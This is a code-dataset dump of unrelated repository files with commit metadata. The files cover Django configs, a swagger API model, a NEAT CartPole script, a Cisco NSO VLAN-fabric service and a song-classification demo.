59f8387031da138416e73dbb2175001f67656639
|
2a6e3a46c877df94f5681798f8bea3a6a506fd59
|
refs/heads/master
| 2022-04-23T16:25:35.878979
| 2020-04-25T13:03:41
| 2020-04-25T13:03:41
| 258,315,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
# Принцип открытости / закрытости
# Расширяйте классы, но не изменяйте их первоначальный код!
# Нужно стремиться к тому, чтобы классы были открыты для расширения,
# и закрыты для изменения.
# Открытый класс - класс, который доступен для расширения (путем создания подкласса)
# Закрытый (законченный) класс - класс, у которого интерфейс окончательно определен и не будет
# меняться в будущем, то есть он готов для использования другими классами
# Цель - не ломать существующий код при внесении изменений в программу.
|
[
"mortalis94@gmail.com"
] |
mortalis94@gmail.com
|
e73cfc2cdec009c867b3c766a6a035d38f33dfd6
|
b3ab2979dd8638b244abdb2dcf8da26d45d7b730
|
/cloudcheckr_cmx_client/models/azure_csp_authorization_request_model.py
|
e76c907e4fd2a4a72db3231108f61a129ace91ae
|
[] |
no_license
|
CU-CommunityApps/ct-cloudcheckr-cmx-client
|
4b3d9b82c5dfdaf24f8f443526868e971d8d1b15
|
18ac9fd4d6c4ae799c0d21745eaecd783da68c0c
|
refs/heads/main
| 2023-03-03T19:53:57.685925
| 2021-02-09T13:05:07
| 2021-02-09T13:05:07
| 329,308,757
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,134
|
py
|
# coding: utf-8
"""
CloudCheckr API
CloudCheckr API # noqa: E501
OpenAPI spec version: v1
Contact: support@cloudcheckr.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AzureCspAuthorizationRequestModel(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purchase_model': 'str',
'region_group': 'str'
}
attribute_map = {
'purchase_model': 'purchaseModel',
'region_group': 'regionGroup'
}
def __init__(self, purchase_model=None, region_group=None): # noqa: E501
"""AzureCspAuthorizationRequestModel - a model defined in Swagger""" # noqa: E501
self._purchase_model = None
self._region_group = None
self.discriminator = None
if purchase_model is not None:
self.purchase_model = purchase_model
if region_group is not None:
self.region_group = region_group
@property
def purchase_model(self):
"""Gets the purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's purchase model. # noqa: E501
:return: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._purchase_model
@purchase_model.setter
def purchase_model(self, purchase_model):
"""Sets the purchase_model of this AzureCspAuthorizationRequestModel.
The account's purchase model. # noqa: E501
:param purchase_model: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["AzurePlan", "Classic"] # noqa: E501
if purchase_model not in allowed_values:
raise ValueError(
"Invalid value for `purchase_model` ({0}), must be one of {1}" # noqa: E501
.format(purchase_model, allowed_values)
)
self._purchase_model = purchase_model
@property
def region_group(self):
"""Gets the region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:return: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._region_group
@region_group.setter
def region_group(self, region_group):
"""Sets the region_group of this AzureCspAuthorizationRequestModel.
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:param region_group: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["Commercial", "UsGov", "Germany"] # noqa: E501
if region_group not in allowed_values:
raise ValueError(
"Invalid value for `region_group` ({0}), must be one of {1}" # noqa: E501
.format(region_group, allowed_values)
)
self._region_group = region_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AzureCspAuthorizationRequestModel, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AzureCspAuthorizationRequestModel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"pea1@cornell.edu"
] |
pea1@cornell.edu
|
1bdf3386a5b0d8cfbe5b707f75b6b7a97e05548a
|
2a713ff21aba33bcbe54ea1448a0509d3ee1a5fd
|
/environments/CartPole-v1/discount_factor.py
|
54c5062d23b82605982b0a1083e6ceb304960052
|
[
"Apache-2.0"
] |
permissive
|
ShreyanshDarshan/PyTorch-NEAT
|
b1b8a3e62d029b6db02459510a6a7d6c2f0f7d06
|
062efa487da3f7e9b444af7babd7868028bbb5f3
|
refs/heads/master
| 2022-10-23T17:49:20.757644
| 2020-06-07T19:37:18
| 2020-06-07T14:20:56
| 270,021,251
| 0
| 0
|
Apache-2.0
| 2020-06-06T20:04:36
| 2020-06-06T15:24:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,249
|
py
|
# Copyright (c) 2018 Archit Rungta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import click
import gym
import neat
from pytorch_neat.discount_factor_eval import DiscountEnvEvalator
from pytorch_neat.neat_reporter import TensorBoardReporter
from pytorch_neat.recurrent_net import RecurrentNet
max_env_steps = 200
env_name = "CartPole-v1"
def make_env():
return gym.make(env_name)
def make_net(genome, config, bs):
return RecurrentNet.create(genome, config, bs)
def activate_net(net, states):
outputs = net.activate(states).numpy()
return outputs[:, 0] > 0.5
@click.command()
@click.option("--n_generations", type=int, default=100)
def run(n_generations):
# Load the config file, which is assumed to live in
# the same directory as this script.
config_path = os.path.join(os.path.dirname(__file__), "neat.cfg")
config = neat.Config(
neat.DefaultGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
config_path,
)
evaluator = DiscountEnvEvalator(
make_net, activate_net, 0.95, make_env=make_env, max_env_steps=max_env_steps
)
def eval_genomes(genomes, config):
for _, genome in genomes:
genome.fitness = evaluator.eval_genome(genome, config)
pop = neat.Population(config)
stats = neat.StatisticsReporter()
pop.add_reporter(stats)
reporter = neat.StdOutReporter(True)
pop.add_reporter(reporter)
logger = TensorBoardReporter("%s-discount" % env_name, "neat.log", evaluator.eval_genome)
pop.add_reporter(logger)
pop.run(eval_genomes, n_generations)
if __name__ == "__main__":
run() # pylint: disable=no-value-for-parameter
|
[
"architrungta120@gmail.com"
] |
architrungta120@gmail.com
|
d50d43cea20a3bde861eedd107d12122e4ea223d
|
18936a3058a0f130676535a3ee6408239fd7cdbc
|
/tests/path_helper.py
|
ed60538c773ea3cff382d9b7f778c6548d9ddf3d
|
[
"BSD-2-Clause"
] |
permissive
|
thxo/cabrillo
|
4b7b5446087897f1a5a57a1aaca93348f4b37b99
|
fbfc047c42f877ff139de367b359de0af1e20441
|
refs/heads/master
| 2023-04-07T08:56:00.674525
| 2023-04-02T08:40:03
| 2023-04-02T08:41:48
| 161,945,220
| 12
| 7
|
BSD-2-Clause
| 2023-04-02T08:32:49
| 2018-12-15T21:28:06
|
Python
|
UTF-8
|
Python
| false
| false
| 239
|
py
|
import sys
import os.path
"""Make the cabrillo module importable from the tests' point of view."""
project_root_dir = os.path.dirname(os.path.dirname(__file__))
if not project_root_dir in sys.path:
sys.path.append(project_root_dir)
|
[
"21995564+thxo@users.noreply.github.com"
] |
21995564+thxo@users.noreply.github.com
|
8de09eab1d45109af504b4a4e86309ad1f917a0d
|
eeccdfd79556fa3b867733132c9e4182389b3380
|
/InstanceHealth/flask/lib/python2.7/encodings/iso8859_9.py
|
1e9881a9bbe9cac0aed38804d7f58850314df9f8
|
[] |
no_license
|
gokula1995/saveTime
|
ce44c5c4b48e1e3d9bc8af8c26b8e4f379937911
|
82f5554932cbdb870595298a6c93a3a1cd97d95a
|
refs/heads/master
| 2020-07-05T17:09:08.012468
| 2019-10-20T15:04:47
| 2019-10-20T15:04:47
| 202,707,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
/usr/local/Cellar/python@2/2.7.15_3/Frameworks/Python.framework/Versions/2.7/lib/python2.7/encodings/iso8859_9.py
|
[
"gokula.adabala@gmail.com"
] |
gokula.adabala@gmail.com
|
b7209cadc13f45308b995e0899d72fa860e99a50
|
30f654d2feea989ed36756a3beab302c4fa51a94
|
/DjangoDockerDemo/wsgi.py
|
b0d95077b72daa9b3cdd65ac27ebaad0416049bd
|
[] |
no_license
|
cbalkig/DjangoDockerDemo
|
a3d061f0ab50bfd8151246d59b8cf80eef61b125
|
384ac5806399d01f5597db3a9e0c5203b285ee85
|
refs/heads/master
| 2022-04-20T07:04:55.984324
| 2020-04-22T12:14:58
| 2020-04-22T12:14:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for DjangoDockerDemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoDockerDemo.settings')
application = get_wsgi_application()
|
[
"balki1985@gmail.com"
] |
balki1985@gmail.com
|
d15d0f7899b5d69e37ae286c5bc3ca8972755234
|
05fbca423d3704c4c2f75ad0677811bbd2bc8ec3
|
/sawa/urls.py
|
333b5d28c62c0d15f9407b7e940e5524041cc760
|
[] |
no_license
|
stilgeki/SAWA
|
653add93da5a5263bdf7c720bb5344a9e4689192
|
4f3534a705ab1bae13f96b7e770f934f2a0550c2
|
refs/heads/master
| 2016-09-14T11:07:47.182117
| 2016-04-28T00:42:14
| 2016-04-28T00:42:14
| 57,258,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.upload, name = 'upload'),
url(r'^execute/$', views.execute, name = 'execute'),
url(r'^help/$', views.help, name = 'help'),
url(r'^results/$', views.results, name = 'results'),
url(r'^loading/$', views.loading, name = 'loading'),
]
|
[
"stilgeki@miamioh.edu"
] |
stilgeki@miamioh.edu
|
0a3ca56c977088ca6e0697402dafb8661ab78d31
|
d08d1d0fd863e3121e27080ac5892bd39f0b11b8
|
/vlan-fabric/python/vlan_fabric/tenant.py
|
83582986a258d51be34d84e463ae50a8caff55a5
|
[
"MIT"
] |
permissive
|
rrojasc/sandbox-nso
|
be4211dbedc3d87d8830616db593dac71c051e75
|
b44dce57904b916a570d0fe272c64cfe1f4c7575
|
refs/heads/master
| 2023-03-16T13:04:25.013628
| 2019-12-16T13:26:12
| 2019-12-16T13:26:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,403
|
py
|
# -*- mode: python; python-indent: 4 -*-
import ncs
from ncs.application import Service
# import resource_manager.id_allocator as id_allocator
import ipaddress
# ------------------------
# SERVICE CALLBACK EXAMPLE
# ------------------------
class ServiceCallbacks(Service):
# The create() callback is invoked inside NCS FASTMAP and
# must always exist.
@Service.create
def cb_create(self, tctx, root, service, proplist):
self.log.info("Service create(service=", service._path, ")")
vars = ncs.template.Variables()
vars.add("DUMMY", "127.0.0.1")
template = ncs.template.Template(service)
disable_trunk_negotiation = False
# PHASE - Get Fabric Member Devices
# primary_ip_address = root.devices.device[pair.primary].config.interface.mgmt["0"].ip.address.ipaddr
switch_pairs = root.vlan_fabric[service.fabric].switch_pair
switches = root.vlan_fabric[service.fabric].switch
# Initialize with NONE
border_pair = None
self.log.info("Switches for Fabric {} are: ".format(service.fabric))
for pair in switch_pairs:
self.log.info(
"Pair: {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
if pair.layer3:
border_pair = pair
self.log.info(
"Layer 3 Switch Pair is {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
self.log.info(
"Switches for Fabric {} are {}".format(service.fabric, switches.__dict__)
)
for switch in switches:
self.log.info("Switch: {}".format(switch.device))
# PHASE - Get Fabric Interconnect Resources for Fabric
fabric_interconnects = root.vlan_fabric[service.fabric].fabric_interconnect
self.log.info("Fabric Interconnects for Fabric {} are:".format(service.fabric))
for fabric_interconnect in fabric_interconnects:
self.log.info("FI: {}".format(fabric_interconnect.device))
# PHASE - Get VMwar DVS Resources for Fabric
vswitches = root.vlan_fabric[service.fabric].vmware_dvs
self.log.info(
"VMware Distributed vSwitches for Fabric {} are:".format(service.fabric)
)
for vswitch in vswitches:
self.log.info(
"vCenter {} Datacenter {} dVS {}".format(
vswitch.vcenter, vswitch.datacenter, vswitch.dvs
)
)
# PHASE - Configure Static Routes if configured
if border_pair:
routing_vars = ncs.template.Variables()
routing_vars.add("VRFNAME", service.name)
# PHASE - Static routes
for route in service.static_routes:
# self.log.info("Setting up static route for {} to {} in VRF {}".format(route.network, route.gateway, service.name))
routing_vars.add("STATIC_ROUTE_NETWORK", route.network)
routing_vars.add("STATIC_ROUTE_GATEWAY", route.gateway)
# PRIMARY
self.log.info(
"Setting up static route for {} to {} in VRF {} on switch_pair {} Primary Device {}".format(
route.network,
route.gateway,
service.name,
border_pair,
border_pair.primary,
)
)
routing_vars.add("DEVICE_NAME", border_pair.primary)
self.log.info("routing_vars={}".format(routing_vars))
template.apply("vrf-static-routes", routing_vars)
# Secondary
if border_pair.secondary:
self.log.info(
"Setting up static route for {} to {} in VRF {} on switch_pair {} Primary Device {}".format(
route.network,
route.gateway,
service.name,
border_pair,
border_pair.secondary,
)
)
routing_vars.add("DEVICE_NAME", border_pair.secondary)
template.apply("vrf-static-routes", routing_vars)
else:
self.log.info(
"Note: Fabric {} has NO Layer 3 Border Pair.".format(service.fabric)
)
# PHASE Process Each Network in Service
for network in service.network:
# PHASE - Add VLANS to all Fabric Switches
self.log.info(
"Adding VLAN {} for Network {}".format(network.name, network.vlanid)
)
network_vars = ncs.template.Variables()
network_vars.add("VLAN_ID", network.vlanid)
network_vars.add("VLAN_NAME", network.name)
for pair in switch_pairs:
self.log.info(
"Adding VLAN for Pair: {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
# PRIMARY
network_vars.add("DEVICE_NAME", pair.primary)
template.apply("vlan-new", network_vars)
if pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", pair.secondary)
template.apply("vlan-new", network_vars)
for switch in switches:
self.log.info("Adding VLAN for Switch: {}".format(switch.device))
network_vars.add("DEVICE_NAME", switch.device)
template.apply("vlan-new", network_vars)
# PHASE - Configure Layer 3 For Network
# Check if layer3-on-fabric is configured for network
if network.layer3_on_fabric:
self.log.info(
"Configuring Layer 3 for {} IP Network {} ".format(
network.name, network.network
)
)
ipnet = ipaddress.ip_network(network.network)
hsrp_ipv4 = ipnet.network_address + 1
primary_ipv4 = ipnet.network_address + 2
secondary_ipv4 = ipnet.network_address + 3
network_vars.add("VRFNAME", service.name)
network_vars.add("HSRP_GROUP", 1)
network_vars.add("HSRP_IPV4", hsrp_ipv4)
if network.build_route_neighbors:
network_vars.add("BUILD_ROUTING_NEIGHBOR", "True")
else:
network_vars.add("BUILD_ROUTING_NEIGHBOR", "")
# PRIMARY
network_vars.add("DEVICE_NAME", border_pair.primary)
network_vars.add(
"SVI_IPV4", "{}/{}".format(primary_ipv4, ipnet.prefixlen)
)
network_vars.add("HSRP_PRIORITY", 110)
template.apply("vlan-layer3", network_vars)
if network.dhcp_relay_address:
network_vars.add("DHCP_RELAY_ADDRESS", network.dhcp_relay_address)
self.log.info("Configuring DHCP Relay address {} for {} IP Network {} ".format(
network.dhcp_relay_address, network.name, network.network
)
)
template.apply("vlan-layer3-dhcp-relay", network_vars)
if border_pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", border_pair.secondary)
network_vars.add(
"SVI_IPV4", "{}/{}".format(secondary_ipv4, ipnet.prefixlen)
)
network_vars.add("HSRP_PRIORITY", 90)
template.apply("vlan-layer3", network_vars)
if network.dhcp_relay_address:
network_vars.add("DHCP_RELAY_ADDRESS", network.dhcp_relay_address)
self.log.info("Configuring DHCP Relay address {} for {} IP Network {} ".format(
network.dhcp_relay_address, network.name, network.network
)
)
template.apply("vlan-layer3-dhcp-relay", network_vars)
else:
self.log.info(
"Skipping Layer 3 configuration in fabric for {} IP Network {} ".format(
network.name, network.network
)
)
# PHASE Process Connections for Network
# PHASE Switch Connections
for switch in network.connections.switch:
self.log.info(
"Adding Connections for Network {} on Switch {}".format(
network.name, switch.device
)
)
network_vars.add("DEVICE_NAME", switch.device)
switch_platform = {}
switch_platform["name"] = root.devices.device[
switch.device
].platform.name
switch_platform["version"] = root.devices.device[
switch.device
].platform.version
switch_platform["model"] = root.devices.device[
switch.device
].platform.model
self.log.info("Switch Platform Info: {}".format(switch_platform))
# For old IOS that supported DTP, need to disable negotiation
if (
switch_platform["model"] != "NETSIM"
and switch_platform["name"] == "ios"
and int(switch_platform["version"][0:2]) < 16
):
disable_trunk_negotiation = True
else:
disable_trunk_negotiation = False
network_vars.add("DISABLE_TRUNK_NEGOTIATION", disable_trunk_negotiation)
network_vars.add("MTU_SIZE", "9216")
# PHASE Interfaces
for interface in switch.interface:
self.log.info(
"Configuring Intereface {} for Network {} on Switch {}".format(
interface.interface, network.name, switch.device
)
)
network_vars.add("INTERFACE_ID", interface.interface)
network_vars.add("DESCRIPTION", interface.description)
network_vars.add("MODE", interface.mode)
network_vars.add("MTU_SIZE", "9216")
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
# PHASE Port-Channels
for port_channel in switch.port_channel:
self.log.info(
"Configuring PortChannel {} for Network {} on Switch {}".format(
port_channel.portchannel_id, network.name, switch.device
)
)
network_vars.add("PORTCHANNEL_ID", port_channel.portchannel_id)
network_vars.add("DESCRIPTION", port_channel.description)
network_vars.add("MODE", port_channel.mode)
network_vars.add("VPC", "")
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# PHASE Port-Channel Member Interfaces
for interface in port_channel.interface:
self.log.info(
"Adding Interface {} to Port-Channel {} on Network {} on Switch {}.".format(
interface.interface,
port_channel.portchannel_id,
network.name,
switch.device,
)
)
network_vars.add("INTERFACE_ID", interface.interface)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# PHASE Switch Pair connections
for pair in network.connections.switch_pair:
self.log.info(
"Adding Connections for Network {} on Switch Pair {}".format(
network.name, pair.name
)
)
# Lookup Pair from Fabric
# switch_pairs = root.vlan_fabric[service.fabric].switch_pair
this_pair = root.vlan_fabric[service.fabric].switch_pair[pair.name]
self.log.info(
"Primary {} Secondary {}".format(
this_pair.primary, this_pair.secondary
)
)
# Nexus Leaf Pairs Always False
disable_trunk_negotiation = False
network_vars.add("DISABLE_TRUNK_NEGOTIATION", disable_trunk_negotiation)
# PHASE Interfaces
for interface in pair.interface:
self.log.info(
"Configuring Intereface {} for Network {} on Pair {}".format(
interface.interface, network.name, this_pair.name
)
)
network_vars.add("INTERFACE_ID", interface.interface)
network_vars.add("DESCRIPTION", interface.description)
network_vars.add("MODE", interface.mode)
network_vars.add("MTU_SIZE", "9216")
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
if this_pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
# PHASE Port-Channels
for port_channel in pair.port_channel:
self.log.info(
"Configuring Port-Channel {} for Network {} on Pair {}".format(
port_channel.portchannel_id, network.name, this_pair.name
)
)
network_vars.add("PORTCHANNEL_ID", port_channel.portchannel_id)
network_vars.add("DESCRIPTION", port_channel.description)
network_vars.add("MODE", port_channel.mode)
network_vars.add("MTU_SIZE", "9216")
network_vars.add("VPC", True)
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# PHASE Port-Channel Member Interfaces
for interface in port_channel.interface:
self.log.info(
"Adding Interface {} to Port-Channel {} on Network {} on Pair {}.".format(
interface.interface,
port_channel.portchannel_id,
network.name,
this_pair.name,
)
)
network_vars.add("INTERFACE_ID", interface.interface)
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# PHASE Fabric Interconnects
for fabric_interconnect in fabric_interconnects:
self.log.info(
"Configuring Network {} on Fabric Interconnect {}".format(
network.name, fabric_interconnect.device
)
)
ucs_vars = ncs.template.Variables()
ucs_vars.add("DEVICE_NAME", fabric_interconnect.device)
ucs_vars.add("VLAN_NAME", network.name)
ucs_vars.add("VLAN_ID", network.vlanid)
# PHASE - Add VLAN to Configuration
self.log.info(
"Adding VLAN {} ({}) on Fabric Interconnect {}".format(
network.name, network.vlanid, fabric_interconnect.device
)
)
self.log.info("ucs_vars=", ucs_vars)
template.apply("ucs-vlan-setup", ucs_vars)
# PHASE - Update vnic-templates
for vnic_template in fabric_interconnect.vnic_template_trunks:
ucs_vars.add("UCS_ORG", vnic_template.org)
ucs_vars.add("UCS_VNIC_TEMPLATE", vnic_template.vnic_template)
self.log.info(
"Adding VLAN {} ({}) to vnic-template {}/{} on Fabric Interconnect {}".format(
network.name,
network.vlanid,
vnic_template.org,
vnic_template.vnic_template,
fabric_interconnect.device,
)
)
self.log.info("ucs_vars=", ucs_vars)
template.apply("ucs-vnic-template-vlan-setup", ucs_vars)
# PHASE - VMwar Distributed Virtual Switch
for vswitch in vswitches:
self.log.info(
"Configuring Network {} on DVS: {}/{}/{}".format(
network.name, vswitch.vcenter, vswitch.datacenter, vswitch.dvs
)
)
dvs_vars = ncs.template.Variables()
dvs_vars.add("DEVICE_NAME", vswitch.vcenter)
dvs_vars.add("VLAN_NAME", network.name)
dvs_vars.add("VLAN_ID", network.vlanid)
dvs_vars.add("VMWARE_DATACENTER", vswitch.datacenter)
dvs_vars.add("VMWARE_DVS", vswitch.dvs)
self.log.info("dvs_vars=", dvs_vars)
template.apply("vmware-dvs-portprofile-setup", dvs_vars)
# The pre_modification() and post_modification() callbacks are optional,
# and are invoked outside FASTMAP. pre_modification() is invoked before
# create, update, or delete of the service, as indicated by the enum
# ncs_service_operation op parameter. Conversely
# post_modification() is invoked after create, update, or delete
# of the service. These functions can be useful e.g. for
# allocations that should be stored and existing also when the
# service instance is removed.
# @Service.pre_lock_create
# def cb_pre_lock_create(self, tctx, root, service, proplist):
# self.log.info('Service plcreate(service=', service._path, ')')
# @Service.pre_modification
# def cb_pre_modification(self, tctx, op, kp, root, proplist):
# self.log.info('Service premod(service=', kp, ')')
# @Service.post_modification
# def cb_post_modification(self, tctx, op, kp, root, proplist):
# self.log.info('Service premod(service=', kp, ')')
|
[
"hank.preston@gmail.com"
] |
hank.preston@gmail.com
|
6d533a22fd7ba72d63f3d689c3fd96da7fecc29a
|
dc893a23ea659a9aff10c972202abae113a31f8d
|
/causal_inference/code/CVPR2012_slidingwindow_action_detection/screen_30_9406.py
|
9e3ea6fc8e19ee4e2ff4b281d8a8a25b4cf04d4f
|
[] |
no_license
|
scotfang/research
|
f28ff4cdcdb579839fddabc7d77a31b324f45a78
|
424e0dce9e5083e75ac49a33765d1a9d7c2878e9
|
refs/heads/master
| 2021-01-01T17:17:15.633209
| 2014-05-12T18:20:43
| 2014-05-12T18:20:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
temporal_parses = {
704: { "usecomputer_START": {"energy": -0.000000, "agent": "uuid1"} },
880: { "usecomputer_END": {"energy": -0.000000, "agent": "uuid1"} },
},
|
[
"scotfang@gmail.com"
] |
scotfang@gmail.com
|
527e23b43539f94bb5c055d96fa9cee41d724973
|
889949036343859dba198e2640f4d5cbed396673
|
/insta_project/insta_project/urls.py
|
c6dc4921aed5fc7c69771c533c7c81f4f54e3772
|
[] |
no_license
|
RiyazUlHaque/s3Django
|
8d7f096d6a560db2e6ee37328e4848dcc8128a7d
|
2e8b52330c04345c6e7e0edc3e180a540f5dd630
|
refs/heads/master
| 2023-01-24T22:02:32.129575
| 2020-12-01T20:48:52
| 2020-12-01T20:48:52
| 290,001,212
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""insta_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings # new
from django.urls import path, include # new
from django.conf.urls.static import static # new
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('posts.urls')), # new
]
if settings.DEBUG: # new
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"riyazulhaque922@gmail.com"
] |
riyazulhaque922@gmail.com
|
8730d58aed4341d6bb3e7fc6860ff9e1ad2d13ce
|
16f524cf688f3cc673883544bc8af4fed8bb0436
|
/demo.py
|
fdd0db6670f51bbb78674b2905ea0ae7ddb4e46c
|
[] |
no_license
|
Alroomi/Song-Classification
|
de2fff43169eba4024f4e4111d9d80a5b7ad7098
|
066ebf50b27a4c25a19da3bc4df05d9a41a5efac
|
refs/heads/master
| 2021-05-06T13:32:00.777472
| 2017-12-05T20:36:26
| 2017-12-05T20:36:26
| 113,230,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,694
|
py
|
import os, os.path, sys
import h5py
import numpy as np
import pickle as pkl
from configs_genre import gen_config as genre_config
from configs_gender import gen_config as gender_config
from configs_year import gen_config as year_config
from models.ann import Classifier
from models.cnn import CNNClassifier
from feature_extractor import FeatureExtractor
from sklearn.utils.extmath import softmax
from utils import parse_csv_list_file
def load_models(task):
if task.startswith('Year'):
cfgs_1, nn_cfgs_1 = year_config(task, 'ann', 'decade')
cfgs_2, nn_cfgs_2 = year_config(task, 'cnn', 'decade')
elif task.startswith('Genre'):
cfgs_1, nn_cfgs_1 = genre_config(task, 'ann')
cfgs_2, nn_cfgs_2 = genre_config(task, 'cnn')
elif task.startswith('Gender'):
cfgs_1, nn_cfgs_1 = gender_config(task, 'ann')
cfgs_2, nn_cfgs_2 = gender_config(task, 'cnn')
ann = Classifier(nn_cfgs_1, log_dir=None)
ann.restore('%s-%d' %(nn_cfgs_1['tf_sess_path'], cfgs_1['n_iters']))
cnn = CNNClassifier(nn_cfgs_2, log_dir=None)
cnn.restore('%s-%d' %(nn_cfgs_2['tf_sess_path'], cfgs_2['n_iters']))
return ann, cnn
def init_ft(task):
if task.startswith('Year'):
cfgs, nn_cfgs = year_config(task, 'ann', 'decade')
elif task.startswith('Genre'):
cfgs, nn_cfgs = genre_config(task, 'ann')
elif task.startswith('Gender'):
cfgs, nn_cfgs = gender_config(task, 'ann')
ft1 = FeatureExtractor(cfgs['feature_list'], cfgs['feature_pool'], cfgs['l2_norm'], cfgs['sr'], 1, cfgs['stride'])
ft2 = FeatureExtractor(['melspectrogram'], 'none', cfgs['l2_norm'], cfgs['sr'], 3, cfgs['stride'])
return ft1, ft2
def get_utils(task):
if task.startswith('Year'):
cfgs, nn_cfgs = year_config(task, 'ann', 'decade')
elif task.startswith('Genre'):
cfgs, nn_cfgs = genre_config(task, 'ann')
elif task.startswith('Gender'):
cfgs, nn_cfgs = gender_config(task, 'ann')
_, cls_to_id, id_to_cls = parse_csv_list_file(cfgs['train_list_fname'])
ann_mean = np.load('means/mean_%s_%s.npy' %(task,'ann'))
cnn_mean = np.load('means/mean_%s_%s.npy' %(task,'cnn'))
return cls_to_id, id_to_cls, ann_mean, cnn_mean
def build_label_map_year2decade(cls_to_id):
new_cls_to_id = dict({})
new_id_to_cls = dict({})
old_to_new_ids = dict({})
counter = 0
years = cls_to_id.keys()
years = sorted(years)
for year in years:
decade = '%d0s' %int(np.floor(int(year) / 10))
if decade not in new_cls_to_id:
new_cls_to_id[decade] = counter # '19x0s' -> 0 ...
new_id_to_cls[counter] = decade # 0 -> '19x0s'
counter += 1
old_to_new_ids[cls_to_id[year]] = new_cls_to_id[decade]
num_ids = len(new_id_to_cls.keys())
return old_to_new_ids, new_id_to_cls, num_ids
def sum_score(scores):
sum_scores = scores.sum(axis=0)
final_pred = np.argmax(sum_scores)
return final_pred
